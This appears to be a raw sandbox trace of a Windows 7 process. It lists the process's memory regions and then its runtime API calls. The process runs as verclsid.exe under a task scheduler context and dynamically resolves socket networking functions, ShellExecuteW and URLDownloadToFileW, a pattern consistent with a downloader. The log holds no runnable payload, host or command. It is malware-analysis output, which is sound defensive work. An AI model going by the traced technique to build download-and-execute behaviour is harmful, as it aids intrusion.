filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4398
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 4399
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4402
start_va = 0x290000
end_va = 0x291fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 4403
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4404
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4405
start_va = 0x1c80000
end_va = 0x1c81fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c80000"
filename = ""
Region:
id = 4406
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 4536
start_va = 0x7fef5d80000
end_va = 0x7fef6936fff
monitored = 0
entry_point = 0x7fef5d81bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 4537
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 4538
start_va = 0x7fef5d20000
end_va = 0x7fef5d73fff
monitored = 0
entry_point = 0x7fef5d2104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4539
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4540
start_va = 0x1c90000
end_va = 0x1c91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c90000"
filename = ""
Region:
id = 4541
start_va = 0x2360000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 4542
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 4543
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4544
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4545
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4546
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4547
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4548
start_va = 0x1ca0000
end_va = 0x1cacfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4549
start_va = 0x1cb0000
end_va = 0x1cb3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 4550
start_va = 0x2480000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 4551
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4552
start_va = 0x1cc0000
end_va = 0x1ce7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 4553
start_va = 0x1cf0000
end_va = 0x1cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cf0000"
filename = ""
Region:
id = 4554
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4555
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4556
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4557
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4558
start_va = 0x1cb0000
end_va = 0x1cb3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4559
start_va = 0x1d00000
end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4560
start_va = 0x1d30000
end_va = 0x1d33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4561
start_va = 0x1d40000
end_va = 0x1da5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4562
start_va = 0x2240000
end_va = 0x224dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4564
start_va = 0x2530000
end_va = 0x25affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 4565
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4567
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4568
start_va = 0x2250000
end_va = 0x2250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002250000"
filename = ""
Thread:
id = 174
os_tid = 0x55c
[0511.090] GetCurrentThreadId () returned 0x55c
[0511.090] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x2d7870
[0511.091] SetThreadLocale (Locale=0x400) returned 1
[0511.093] GetVersion () returned 0x1db10106
[0511.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.093] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0511.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.094] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0511.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.094] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadUILanguage") returned 0x77b5bba0
[0511.094] GetSystemInfo (in: lpSystemInfo=0xed980 | out: lpSystemInfo=0xed980*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0511.094] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0511.094] GetStartupInfoW (in: lpStartupInfo=0xed948 | out: lpStartupInfo=0xed948*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0511.094] GetACP () returned 0x4e4
[0511.094] GetCurrentThreadId () returned 0x55c
[0511.094] GetVersion () returned 0x1db10106
[0511.095] GetVersionExW (in: lpVersionInformation=0xed89c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfdd3bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀 攀∀) | out: lpVersionInformation=0xed89c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0511.095] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fefc970000
[0521.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.106] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1e30000
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="closesocket") returned 0x7feffcd18e0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="select") returned 0x7feffcd4da0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1f68d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="recvfrom") returned 0x7fefc9717ac
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="sendto") returned 0x7feffcdd7f0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1f68d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="inet_addr") returned 0x7feffcd1350
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1f68d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="htons") returned 0x7feffcd1250
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="setsockopt") returned 0x7fefc971664
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSAStartup") returned 0x7feffcd4980
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="socket") returned 0x7feffcdde90
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSACleanup") returned 0x7feffcd4cc0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1f68d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="gethostbyname") returned 0x7feffcd8df0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1f68d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="send") returned 0x7feffcd8000
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1f68d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="connect") returned 0x7feffcd45c0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1f68d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="recv") returned 0x7fefc971744
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="gethostname") returned 0x7feffcdae20
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1f68d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="inet_ntoa") returned 0x7feffcdd9a0
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1f68d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="ntohs") returned 0x7feffcd1250
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1f68d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSAGetLastError") returned 0x7feffcd1290
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0521.111] GetProcAddress (hModule=0x7fefc970000, lpProcName="getpeername") returned 0x7feffcfe450
[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0521.111] GetProcAddress (hModule=0x7fefc970000, lpProcName="getsockname") returned 0x7feffcd9480
[0521.111] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0521.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0521.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1f68d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0521.125] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="ShellExecuteW") returned 0x7fefe50983c
[0521.125] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7feffda0000
[0525.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0525.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0525.999] GetProcAddress (hModule=0x7feffda0000, lpProcName="URLDownloadToFileW") returned 0x7feffe395e4
[0526.000] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0526.000] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7fefe210000
[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0526.000] GetProcAddress (hModule=0x7fefe210000, lpProcName="StrRetToStrW") returned 0x7fefe221078
